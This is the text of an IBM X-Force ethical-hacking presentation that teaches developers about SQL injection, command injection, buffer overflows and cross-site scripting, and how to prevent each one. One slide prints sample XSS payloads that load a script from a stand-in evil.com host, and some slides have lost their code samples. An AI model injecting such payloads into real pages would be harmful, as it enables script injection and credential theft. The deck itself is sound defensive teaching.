View On-demand Webinar: https://securityintelligence.com/events/uncover-whats-inside-mind-hacker/ A simple software vulnerability can make the bad guys very wealthy. A bustling new market for software vulnerabilities is emerging. An operating system vulnerability can be worth as much as $1 million on the black market. Ethical Hacker Paul Ionescu aims to put a dent in the bad guys’ pockets by helping developers to “put their hackers’ hats on” and prevent software vulnerabilities. During this presentation, Paul: - Demos common software programming flaws - Discusses notable security breaches that were caused by vulnerabilities such as SQL Injection - Examines ways to implement software defenses that prevent security flaws from re-emerging

1. Inside the Mind of a Hacker
PAUL IONESCU, IBM X-FORCE ETHICAL HACKING TEAM

2. The Price of a Security Bug
INTRODUCTION

3. 3 IBM Security
Functionality vs. Security
• As developers we want to create
highly functional software unrestricted
by the constraints of compliance
standards and tedious business
processes.
• Product security is incorrectly
perceived to be a burden on agile
software development.
• Security measures are often an
afterthought. Something you have to
do not something you want to do.
High Security
Low Security
High Functionality
Low Functionality

4. 4 IBM Security
Developing Secure and Highly Functional Products is Possible
• If done early in the development
lifecycle security is not hard or costly
or conflicting with functionality.
• This can be achieved by educating
developers about threats.
High Security
Low Security
High Functionality
Low Functionality

5. 5 IBM Security
What is a 0-day?
• A zero day is an unpublished security bug that has become known by a malicious party
• Commonly found in widely used software

6. 6 IBM Security
Meet The Hackers Who Sell Spies The Tools To Crack Your PC
Vupen’s chief executive and lead hacker,
Chaouki Bekrar, says his company never
had any intention of telling Google its secret
techniques—certainly not for $60,000 in
chump change.”
ANDY GREENBERG, FORBES
The Security Vulnerability Business
• VUPEN – specializing in selling zero-days to the highest bidder
• Refused Pwn2Own $60k prize because the zero day was worth more undisclosed

7. 7 IBM Security
Bug Poaching
• As uncovered recently by IBM X-Force, web application flaws used in
Ransomware style attacks.
• 30 enterprise organizations targeted last year.
• Attackers find and exploit website vulnerabilities.
• SQL Injection main method of attack.
• Once they obtain sensitive data attackers store it on a cloud service
• An email is sent to the organization that links to the data as proof that the
attacker has penetrated the network.
• Attackers ask for large payments, $30k+ to reveal the flaws

8. 8 IBM Security
Types of Hackers
• White-hat hackers
̶ abide by the rules of responsible disclosure
̶ notify companies about vulnerabilities before making them public
̶ they don’t require any other reward than recognition for identifying the issue
̶ also referred to as ethical hackers
• Gray-hat hackers
̶ operate at the boundary of the law
̶ may be selling zero-day vulnerabilities to the bad guys or governments
• Black-hat hackers
̶ they are the cybercriminals
̶ use zero-days to break into systems and steal data.

9. 9 IBM Security
What would a Hacker do?
• Understanding common programming flaws can help developers
prevent security issues
• Getting into the hacker mindset allows identifying abuse cases
• Implement software defenses while the software is written,
reducing cost and potentially avoiding thousands of dollars in
damages
• You can cost the black hat and grey hats lots of money because
they won’t have 0-days to sell!

10. 10 IBM Security
The Top Programming Flaws
• Two highly used lists: OWASP Top 10 and MITRE (SANS) Top 25.
• The MITRE Top 25 focuses on software mistakes.
# CWE Name
1 CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
2 CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command
Injection')
3 CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
4 CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

11. SQL Injection
ATTACKING THE DATABASE

12. 12 IBM Security
The 15 worst data security breaches of the 21st Century
134 million credit cards exposed
through SQL injection to install
spyware on Heartland's data
systems”
TAYLOR ARMERDING, WWW.CSOONLINE.COM
The Worst Data Breach of the 21st Century
• In comparison the OPM hack was 21.5 million records
• In 2012 SQLi responsible for more than half of all data breaches where the attack type has been
disclosed according to IBM X-Force

13. 13 IBM Security
• User input is concatenated into a database query
• Attacker can manipulate the query practically injecting SQL code and altering the functionality of the
application
• Attackers can even execute OS commands
What is the programming flaw?

14. 14 IBM Security
• Java Prepared Statement example, removing the need for concatenation
Preventing SQL Injection with Parameterized Statements

15. 15 IBM Security
• Many user-provided parameters only need to be alphanumeric
• Input Validation whitelisting – alphanumeric by default, special characters by exception
• This reduces the attack surface for many types of attacks not only SQL Injection
• Implement an input validation framework
Adding Input Validation to Prevent Injection

16. OS Command Injection
ATTACKING THE SHELL

17. 17 IBM Security
Web attacks build on Shellshock bug
One group used their Shellshock
botnet to bombard machines run by
Akamai with huge amounts of junk
data to try to knock them offline.
WWW.BBC.COM
The Famous 0-Day
• The 2014 Shellshock bug affected millions of servers around the world
• It has it’s own logo and Wikipedia article.

18. 18 IBM Security
• The software concatenates or substitutes user input in a shell command.
• The example below is from the recently disclosed “ImageTragik” bug
• The %M part is substituted with a user-provided link. If a graphics file contains a link like this:
• The software executes:
What is the programming flaw?

19. 19 IBM Security
• Use Input Validation
• Use parameterized functions where user input is being passed as parameters rather than one full
command
Preventing Command Injection
Vulnerable Using a Parameterized Function

20. Buffer Overflow
ATTACKING THE MEMORY

21. 21 IBM Security
• A contest held during the CanSecWest security conference.
• Payouts topped $500,000 in 2014, with over a dozen new vulnerabilities found in Adobe
Reader, Adobe Flash Player, Internet Explorer 11, Google Chrome and Mozilla Firefox
• Many the zero-days disclosed at Pwn2Own are memory flaws — for example, CVE-
2012-1876, which is a buffer overflow in Internet Explorer, or CVE-2014-1303, a buffer
overflow in Apple Safari.
• Using such a vulnerability gives the attacker complete control over the victim’s machine.
• For these reason memory flaws found in common software are extremely valuable on the
black market.
Pwn2Own

22. 22 IBM Security
Chinese Hackers Compromised Forbes.com Using IE, Flash Zero Days
Chinese APT group uses IE,
Flash zero days to compromise
Forbes.com
CHRIS BROOK, WWW.THREATPOST.COM
Using Software Flaws in Cyber Espionage

23. 23 IBM Security
• Buffer Overflow is caused by improper memory management in C/C++ code
• Example simple C program that validates a password
• The code does not perform any validation on the length of the user input and does not bother ensuring
that sufficient memory was allocated to store the data coming from the user
What is the programming flaw?

24. 24 IBM Security
• The table below shows the memory representation for our vulnerable program, where 0 stands for the
null character
• If the user enters more than 16 “A” characters in the verification password, it will override the
information stored at the 0x0111 address
Overflowing the buffer

25. 25 IBM Security
• The attacker could overwrite the section in the memory that holds instructions, causing the execution
of arbitrary code as shown in the simplistic representation below.
Overflowing the program instructions

26. 26 IBM Security
• Use safe functions. For example fgets (…) allows you to limit the size of the input; fgets (userPass,
16, stdin) resolves the problem.
• Ensure that the size of the input matches the size of the allocated memory.
• Avoid employing user input as format string arguments. This can lead to another memory flaw: format
string injection.
• Be careful both when allocating memory and when releasing memory. Use-after-free is another type of
memory flaw where the program keeps a reference to a location of the memory. Data at that location
can be arbitrarily modified.
• Use safe compiler flags. Such flags enable operating system defenses that make the insertion of
arbitrary commands very difficult. For example, Address Space Layout Randomization is a Windows
protection mechanism.
Protecting From Memory Attacks

27. Cross-Site Scripting
ATTACKING THE WEB PAGE

28. 28 IBM Security
Earlier today we were informed of a
malicious site that was spreading links to
StalkDaily.com on Twitter without user
consent via a cross-site scripting
vulnerability.”
TWITTER COMMUNIQUE, APR 11,2009
The XSS Worm
• Malicious Cross-Site Scripting (XSS) script would spread itself from user to user by modifying
each user’s profile
• Other social networking sites notably affected by XSS worms. Samy worm affected 1 million
MySpace users in 2005
• Attack also commonly used to spoof websites and steal passwords. Major online retailers
targeted.

29. 29 IBM Security
• XSS occurs when the web page inserts user input in an unsafe context
• Example unsafe contexts
̶ During server side page generation:
User name: <%=request.getParameter(“userName”)%>
User name: <script src=“https://evil.com/attack.js”></script>
̶ During server side page generation in a JavaScript attribute:
<body onload=“loadProfile(<%=request.getParameter(‘userid’)%>’’)”>
<body onload=“loadProfile(1);eval("var
a=document.createElement("script");a.src="https://evil.com/attack.js";document.bod
y.appendChild(a);")”>
̶ During server side page generation in a JavaScript snippet:
<script>loadProfile(<%=request.getParameter(‘userid’)%></script>”>
̶ Dynamic updates of innerHtml element attribute:
userNameDiv.innerHtml = user.Name;
• Due to the many areas that can be impacted by XSS it is difficult to defend and to miss.
What is the programming flaw?

30. 30 IBM Security
• HtmlEncode user input before introducing it into unsafe context.
• Dynamic page updates should update the innerText / contentText attribute of html nodes
• Enforcing request token checks can prevent reflected cross-site scripting because the page will expire.
It will also prevent
• Use secure headers:
X-XSS-Protection: 1; mode=block – Enforces the browser XSS filter
Content-Security-Policy: script-src ‘self’ – Prevents loading external scripts
Protecting From Web Page Attacks

31. Catching Software Flaws
DEFENDING AGAINST THE HACKERS

32. 32 IBM Security
• AppScan is an application
security scanner
• Tooling available both as a
cloud service and installable
• Interacts with the application
and conducts automated
attacks
• In the screenshot you can
see a scan of a server
vulnerable to SQL Injection
and OS Command Injection
Catching SQL Injection and Command Injection with Dynamic Analysis

33. 33 IBM Security
• AppScan Source is a
Static Analysis tool also
available as a cloud
service.
• It examines the
program code to
identify security issues.
• In the screenshot you
can see a scan of the
vulnerable sample
program presented
earlier
Catching Buffer Overflow with Static Analysis

34. ibm.com/security
securityintelligence.com
xforce.ibmcloud.com
@ibmsecurity
youtube/user/ibmsecuritysolutions
© Copyright IBM Corporation 2016. All rights reserved. The information contained in these materials is provided for informational purposes only, and is provided AS IS without warranty of any kind, express
or implied. IBM shall not be responsible for any damages arising out of the use of, or otherwise related to, these materials. Nothing contained in these materials is intended to, nor shall have the effect of,
creating any warranties or representations from IBM or its suppliers or licensors, or altering the terms and conditions of the applicable license agreement governing the use of IBM software. References in these
materials to IBM products, programs, or services do not imply that they will be available in all countries in which IBM operates. Product release dates and / or capabilities referenced in these materials may
change at any time at IBM’s sole discretion based on market opportunities or other factors, and are not intended to be a commitment to future product or feature availability in any way. IBM, the IBM logo, and
other IBM products and services are trademarks of the International Business Machines Corporation, in the United States, other countries or both. Other company, product, or service names may be trademarks
or service marks of others.
Statement of Good Security Practices: IT system security involves protecting systems and information through prevention, detection and response to improper access from within and outside your enterprise.
Improper access can result in information being altered, destroyed, misappropriated or misused or can result in damage to or misuse of your systems, including for use in attacks on others. No IT system or
product should be considered completely secure and no single product, service or security measure can be completely effective in preventing improper use or access. IBM systems, products and services are
designed to be part of a lawful, comprehensive security approach, which will necessarily involve additional operational procedures, and may require other systems, products or services to be most effective.
IBM DOES NOT WARRANT THAT ANYSYSTEMS, PRODUCTS OR SERVICES ARE IMMUNE FROM, OR WILL MAKE YOUR ENTERPRISE IMMUNE FROM, THE MALICIOUS OR ILLEGAL CONDUCT
OF ANY PARTY.
FOLLOW US ON:
THANK YOU